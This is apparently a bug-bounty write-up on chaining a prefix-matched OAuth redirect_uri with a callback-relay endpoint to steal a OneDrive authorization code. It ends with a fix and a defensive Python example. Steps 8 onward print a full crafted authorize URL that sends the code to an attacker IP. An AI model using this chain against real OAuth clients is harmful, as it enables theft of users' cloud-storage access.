Stealing Access Token of One-drive Integration By Chaining CSRF Vulnerability

Arbaz Hussain
Jul 18, 2017

Severity: High

Complexity: Easy

Weakness: partial (prefix) matching of the OAuth redirect_uri path

Steps to Reproduce:

  1. The site has a third-party integrations tab at site.com/integrations, which includes a OneDrive integration.
  2. Click Activate on the OneDrive integration.
  3. You get redirected to:

https://login.live.com/oauth20_authorize.srf?client_id=00000000440E0CCX&response_type=code&redirect_uri=https://www.site.com/account/skydriveOAuthCallback&scope=wl.basic wl.skydrive wl.skydrive_update wl.offline_access

From the above URL:

redirect_uri=https://www.site.com/account/skydriveOAuthCallback

4. So I started playing with redirect_uri=

I found that redirect_uri accepts anything after

redirect_uri=https://www.site.com/account/xxxxxxxxxx

5. This confirms that they did not enforce a strict path match on redirect_uri: any path under https://www.site.com/ is accepted. The probe URL below and the final chain both sit outside /account/, so in practice the match pinned only the scheme and host, not the registered callback path.

https://login.live.com/oauth20_authorize.srf?client_id=00000000440E0CCX&response_type=code&redirect_uri=https://www.site.com/xxxxxxxxxxx&scope=wl.basic wl.skydrive wl.skydrive_update wl.offline_access

6. The provider appends the authorization code to whatever redirect_uri it accepted, so the way to exploit this and get at the token is to find an open redirect on www.site.com that will forward that request to an attacker-controlled host. I kept looking for open-redirect endpoints on site.com, but had no luck.

7. The next day I started reading their API documentation, and came across:

GET /api/testCallback?callback_url=http://yoursite.com

which they use for checking API callback requests against your server.

8. So finally we have a CSRF vulnerability: an endpoint on www.site.com that makes a GET request to the attacker's server. For this chain it plays the role of the missing open redirect, because it lives under the accepted redirect_uri prefix and relays the callback to a host the attacker controls:

&redirect_uri=https://www.site.com/api/testCallback?callback_url=http://52.66.158.189/?

Finally:

https://login.live.com/oauth20_authorize.srf?client_id=00000000440E0CCX&response_type=code&redirect_uri=https://www.site.com/api/testCallback?callback_url=http://52.66.158.189/?&scope=wl.basic+wl.skydrive+wl.skydrive_update+wl.offline_access

~ Success ~

Fix: the redirect_uri must be compared against the registered callback with an exact match (scheme, host and full path, no extra query or fragment) instead of a partial or prefix match. Note also that the authorize URL above carries no state parameter, so the client's callback has no CSRF protection of its own; that is a separate check worth adding.
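The following is an added example, not code from the original post or from the site it describes. It models a toy authorization endpoint that applies first the lax prefix match the write-up observed in steps 4 and 5, then the exact match recommended above, and runs both against the redirect_uri values quoted in the post. The registered callback is taken from the post's authorize URL; the prefix rule (anything under https://www.site.com/) and the hypothetical attacker host in OFFSITE are assumptions made for the example, not the provider's real logic.

```python
"""Added example (not from the original post): lax prefix match vs. exact match
on redirect_uri, exercised with the URLs quoted in the write-up.

Assumptions: the registered callback is the one in the post's authorize URL; the
prefix rule below models the observed behaviour and is not the provider's code."""
from typing import Callable, Optional
from urllib.parse import urlencode, urlsplit, urlunsplit

# The single callback the client registered (taken from the post's authorize URL).
REGISTERED_REDIRECT_URIS = {
    "https://www.site.com/account/skydriveOAuthCallback",
}

# Assumption: the observed check pinned only scheme and host, not the path.
WEAK_PREFIX = "https://www.site.com/"

# redirect_uri values quoted in the post.
LEGIT = "https://www.site.com/account/skydriveOAuthCallback"
PROBE = "https://www.site.com/account/xxxxxxxxxx"
CHAINED = "https://www.site.com/api/testCallback?callback_url=http://52.66.158.189/?"
# Constructed for contrast (not from the post): attacker-owned host, must fail both checks.
OFFSITE = "https://52.66.158.189/account/skydriveOAuthCallback"


def weak_redirect_check(redirect_uri: str) -> bool:
    """Prefix match: accepts any path or query under the client's origin."""
    return redirect_uri.startswith(WEAK_PREFIX)


def strict_redirect_check(redirect_uri: str) -> bool:
    """Exact match against the registered value after minimal normalisation."""
    parts = urlsplit(redirect_uri)
    # The registered URI has no query or fragment, so none may be supplied;
    # the query string is exactly where the callback_url= payload lives.
    if parts.query or parts.fragment:
        return False
    # Scheme and host are case-insensitive; the path is compared byte-for-byte,
    # so /account/xxxxxxxxxx and a trailing-slash variant are both rejected.
    normalised = urlunsplit(
        (parts.scheme.lower(), parts.netloc.lower(), parts.path, "", "")
    )
    return normalised in REGISTERED_REDIRECT_URIS


def provider_redirect(redirect_uri: str, code: str) -> str:
    """Where the provider sends the browser: the accepted redirect_uri plus the code."""
    sep = "&" if "?" in redirect_uri else "?"
    return f"{redirect_uri}{sep}{urlencode({'code': code})}"


def authorize(
    redirect_uri: str, code: str, check: Callable[[str], bool]
) -> Optional[str]:
    """Toy authorize endpoint: returns the Location header, or None on rejection."""
    if not check(redirect_uri):
        return None
    return provider_redirect(redirect_uri, code)


if __name__ == "__main__":
    cases = [("legit", LEGIT), ("probe", PROBE), ("chained", CHAINED), ("offsite", OFFSITE)]
    for name, uri in cases:
        print(f"{name:8} weak   -> {authorize(uri, 'AUTHCODE', weak_redirect_check)}")
        print(f"{name:8} strict -> {authorize(uri, 'AUTHCODE', strict_redirect_check)}")
```

With the weak check, the chained redirect_uri is accepted and the resulting Location header is a request to www.site.com's testCallback endpoint whose query string carries both callback_url=http://52.66.158.189/? and the freshly issued code; with the exact match the same request is rejected before any code is issued, and only the registered callback (case differences in scheme and host aside) gets through.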
